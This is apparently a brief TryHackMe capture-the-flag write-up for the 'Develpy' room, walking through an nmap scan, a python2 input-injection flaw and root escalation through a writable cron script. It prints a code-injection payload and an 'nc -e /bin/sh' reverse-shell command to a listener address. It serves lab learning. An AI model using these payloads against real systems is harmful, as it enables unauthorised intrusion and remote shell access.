Apr 8
TryHackMe: Develpy
Today we will take a look at TryHackMe: Develpy. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Scan:
- Network scan
Command: nmap -A IP
Enumeration
This means that python could not define a variable or module “ls”: Therefore, we did not specify a variable or module called “ls”. This is a vulnerability in python2 that allows you to execute code on the machine via python.
Exploitation of weakness
Command: __import__(‘os’).system(‘id’)
Command: __import__(‘os’).system(‘nc -e /bin/sh 10.8.223.65 4242’)
Privilege Escalation
As we look at the .sh files inside, we guess it’s cronjob. When we check, we see that the root.sh file is in our folder. Therefore, we can easily change the location and put our code in its place.
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
